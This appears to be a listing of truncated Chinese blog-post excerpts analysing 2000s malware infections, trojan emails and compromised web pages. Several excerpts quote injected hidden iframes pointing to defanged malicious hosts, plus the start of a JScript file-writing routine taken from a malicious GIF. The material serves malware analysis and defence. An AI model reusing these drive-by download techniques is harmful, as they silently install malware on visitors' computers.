其他

MsSigChk——用MASM32寫的微軟檔案數位簽章檢驗程式（9.50 KB） 　　現在替換Windows的系統檔案的惡意程式越來越多了，雖然Windows內建的程式也可以檢驗Windows的系統檔案的數位簽章，但使用起來並不是很方便…… 　　於是偶把 pe_xscan 中 檢驗微軟檔案數位簽章 的相關代碼抽出來單獨做成一個小程式——MsSigChk。 　　* 支援檔案拖放　　* 有簽名和無簽名的檔案分別存放，方便複製/粘貼。 ：http://endurer.ys168.com， 在

endurer　原創2006-08-26 第1版一位網友的電腦，這兩天瑞星開機掃描總報告發現 Backdoor.Gpigeon.uql。如：-----------病毒名稱 處理結果 發現日期 路徑檔案病毒來源Backdoor.Gpigeon.uql 清除成功  2006-08-25 08:19 IEXPLORE.EXE>>C:/Program Files/Internet Explorer/IEXPLORE.EXE本機-----------/使用HijackThis（可以到

小心題為：好久不見啦! 的郵件傳播Trojan-PSW.Win32.Maganiaendurer 原創2008-05-23 第1版主　題： 好久不見啦! 正　文： 哈囉妳最近好ㄇ??好想妳唷～我最好ㄌ好朋友唷～!!>0<......+-+......先掰啊～!!......要回信唷!!!附　件： 禬苂~~~苂苂!.zip檔案說明符 : D:/test/禬苂~~~苂苂!.zip屬性 : A---擷取檔案版本資訊大小失敗!建立時間 : 2008-5-19 21:56:29修改時間 : 2

來源：IT世界　　我們都知道,由於VPN傳輸的是私人資訊，VPN使用者對資料的安全性都比較關心。 目前VPN主要採用四項技術來保證安全，這四項技術分別是隧道技術（Tunneling）、加解密技術（Encryption & Decryption）、密鑰管理技術（Key Management）、使用者與裝置身份認證技術（Authentication）。 　　1.隧道技術：

一、IEFO簡介Image File Execution Options（IEFO，映像劫持）是現在許多惡意程式用來阻止諸如殺毒軟體這樣的系統安全防護軟體啟動的一種技術，甚至工作管理員taskmgr.exe，登錄編輯程式regedit.exe也會被這種技術阻止而無法使用。至於IEFO的工作原因網上已有相關文章說明，這裡不再詳述。有興趣的朋友可以Google一下。在pe_xscan掃描的日誌中，O26組會檢測並報告IEFO項目，如： O26 - IFEO: avp.exe -> ntsd -

endurer原創剛才，一位網友說他的電腦更改案頭背景圖片不見效，讓我幫他看看。用QQ的遠程協助，在他的電腦上操作：他的電腦使用的是Windows

endurer 原創2006-08-22 第1版 首頁有3處地方被加入：/--------＜iframe height=0 width=0 src="hxxp://***object.cnic**b.com/15"＞＜/iframe＞--------/hxxp://***object.cnic**b.com/15   的內容為插入許多空格的JavaScript指令碼，利用 Microsoft.XMLHTTP 和 Scripting.FileSystemObject 下載檔案 利用

endurer　原創2006-05-27　第1版今天一位朋友說他的電腦無法上聯眾玩遊戲，讓我幫忙看看。該朋友的電腦系統是新裝的Win 2000，未打任何補丁，裝有金山毒霸和金山網鏢。啟動聯眾程式，金山網鏢就彈出詢問視窗，該朋友不明白這個東東，所以選擇了不允許，就玩不了遊戲了。在打系統補丁時，用HijackThis掃描log，發現可疑啟動項：O4 - HKLM/../Run: [File Mapping Services] hp-1003.exeO4 - HKLM/../RunServices:

endurer 原創2006-11-25 第1版QQ收到如下資訊：/------4*****1(4*****1)  (2006-11-25 17:31:11)看看我的嗨舞視頻~~~~才上傳到Q-Zone空間的...是不是有點太露了?hxxp://q-zone.qq.%64***%37*%67%2E****%63%6E/ID=****2*/**------/hxxp://q-zone.qq.%64***%37*%67%2E****%63%6E/ID=****2*/**  

endurer　原創2006-07-21　第1版論壇首頁被加入：------------------＜iframe src="hxxp://msbyl***.***go1.icpcn.com/" width="0" height="0" frameborder="0"＞＜/iframe＞------------------hxxp://msbyl***.***go1.icpcn.com/的代碼為：------------------＜SCRIPT language=VScript

endurer　原創2006-08-23 第1版有網友的電腦中的IE首頁被強制設定為 hxxp://www.haohao1.com。使用HijackThis（可以到 http://endurer.ys168.com 下載）掃描log，發現一個可疑項：/------------F2 - REG:system.ini: UserInit=C:/WINDOWS/system32/userinit.exe,C:/WINDOWS/system32/userint.exe------------/用

遭遇scvhost.exe,kcohj1ba.sys,4f4.exe,w509v.sys,8g4.dll,307b.dll等 endurer 原創2008-09-01 第1版 今天開會時，需要播放課件，為此準備了兩台本本，不料作為備用的那台本本，開機後就不週期性彈出訊息框，提示載入307b.dll出錯。明顯是中標了。 這訊息框勢必會影響課件地播放，必須立即處理。 該本本裝有Kingsoft Internet Security

endurer　原創2006-07-31　第3版補充殺毒軟體的反應。2006-07-30　第2版補充殺毒軟體的反應。2006-07-29　第1版昨天，有位網友的說，他電腦上的瑞星開機自動掃描總報告：-----------Backdoor.Gpigeon.uql            清除成功    2006-07-28 16:01      IEXPLORE.EXE>>C:/Program Files/Internet Explorer/IEXPLORE.EXE本機---------

endurer 原創2006-11-28 第1版一位網友的電腦，最近江民殺毒軟體總示發現yok*.*感染病毒，開機時會提示找不到檔案，讓偶幫忙檢查。開啟IE，發現首頁被設定為 hxxp://www.my123.com，到瑞星網站下載my123.com專殺工具，到 http://endurer.ys168.com 下載 HijackThis, ProcView。用瑞星my123.com專殺工具掃描，沒有發現可疑檔案……汗！江民KV好像沒有記錄匯出功能，汗！用 HijackThis 掃描

某論壇掛馬Worm.Win32.Autorun.eyh論壇網頁包含代碼：/---<iframe width='0' height='0' src='hxxp://www.5**4*z**c.cn/1**7aq/q.js'></iframe>---/hxxp://www.5**4*z**c.cn/1**7aq/q.js輸出代碼：/---＜IFRaME src="hxxp://m**.sf*s3**wws.cn/03/x4.htm" width=1

10 common security mistakes that should never be made10個不應犯的常見安全錯誤 Author: Chad Perrin作者：Chad Perrin 翻譯：endurer 2008-08-25 第1版 Category: Security, Authentication, Encryption, Risk Management, Privacy分類：安全，認證，加密，風險管理，隱私 Tags: Password, Security, Chad

endurer 原創2006-11-03 第1版今天中午向那位中了Worm.Viking.dy的網友瞭解戰況。網友說昨天用江民出的威金蠕蟲專殺掃描，發現並修複了一些EXE檔案。今天又用江民出的威金蠕蟲專殺掃描，沒有發現。然後安裝了瑞星下載版，升級到最新並掃描，結果在D盤和F盤又發現了一些感染 Worm.Viking.dy 的EXE檔案，瑞星報告清除了。看來江民出的威金蠕蟲專殺雖然不錯，但似乎掃描得不徹底。昨天發現的C:/Program

endurer 原創2006-12-04

endurer　原創2006-04-08　第1版網頁：hxxp://www.***ai49.com/bbs/reg.asp有2處被插入了代碼：＜iframe height=0 width=0 src="hxxp://down.***gament.net/q/f"＞＜/iframe＞hxxp://down.***gament.net/q/f的代碼為： ＜script language="javascript" src="ah.js"＞＜/script＞  ah.js的代碼為：   GIF89a

purpleendurer　原創2006-04-08　第1版對　發現一個使用技術升級、下載灰鴿子的網站　中的惡意檔案young.gif進行了分析和注釋，收穫頗多。其一便是利用ADODB寫檔案。下面的代碼是從young.gif中截取、修改的，用來寫入檔案c:/boot.hta。<html><HEAD></HEAD></HTML><SCRIPT language=JScript>try{ var strHello = "hello"; //